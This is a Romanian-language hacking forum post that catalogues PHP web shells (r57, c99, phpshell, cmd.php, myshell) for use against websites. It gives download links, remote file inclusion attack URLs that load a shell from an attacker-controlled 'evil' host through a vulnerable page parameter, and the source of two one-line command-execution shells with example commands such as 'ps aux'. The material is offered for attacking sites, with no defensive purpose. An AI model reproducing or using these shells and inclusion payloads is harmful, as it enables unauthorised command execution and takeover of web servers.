Jump to content
thazer

PhP Shells

Recommended Posts

Posted

Sunt scurt si la punct , nu am sa explic ce sunt alea php-shell-uri sau cum se folosesc.

r57 shell - Shell script scris de o echipa rusa de programare RST/GHC http://rst.void.ru/

sursa shell - http://rst.void.ru/download/r57shell.txt

folosire (remote/local) http://site.com/index.php?page=http://rst....ad/r57shell.txt?

p.s. - shellul e in rusa , pentru engleza cautati pe site-ul lor [anti lenesi deaia nu va zic linku] pentru folosire locala salvare r57shell.txt in r57shell.php si accesare web

c99shell - Script tot rusesc facut de ccteam http://ccteam.ru (din pacate site-ul e de mult offline)

sursa - http://rapidshare.de/files/24367476/c99shell.zip.html

folosire (remote/local) http://site.com/index.php?page=http://evil...om/c99shell.txt?

p.s - shellul e in engleza , cu toate ca are cateva bug-uri e bun zic eu pentru folosire remote redenumiti

fisierul in .txt , pentru local ramane .php (valabil si c99shell si r57shell)

cmdshell - Script foarte simplu folosire doare remote

sursa - feceti un fisier evil.txt si introduceti:



<?

system($_GET['cmd']);

die ("bY thazer");

?>

folosire (remote) http://site.com/index.php?page=http://evil...evil.txt?cmd=ps aux

cmdshell2 - Script simplu a 2-a versiune (metoda)

sursa - feceti un fisier evil2.php si introduceti:



<?php exec($GET['cmd2']); ?>

folosire (remote) http://site.com/index.php?page=http://evil...vil.php?cmd2=ps aux

phpshell.php - Script folositor cu php-shell si file-browser (file-explorer)

sursa - http://rapidshare.de/files/24368917/phpshe...ll.php.zip.html

folosire (local) http://site.com/phpshell.php

cmd.php - Script foarte folosit la "nologin-uri" facut de Martin Geisler

sursa - http://easynews.dl.sourceforge.net/sourcef...hpshell-1.8.zip

versiune noua : http://easynews.dl.sourceforge.net/sourcef...hpshell-2.1.zip

folosire - http://site.com/cmd.php

myshell - Script folosit la "nologin-uri" gen cmd.php optiune noua de editare fisiere..

sursa - http://www.digitart.com.mx/php/myshell/

folosire (local) http://site.com/myshell.php

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...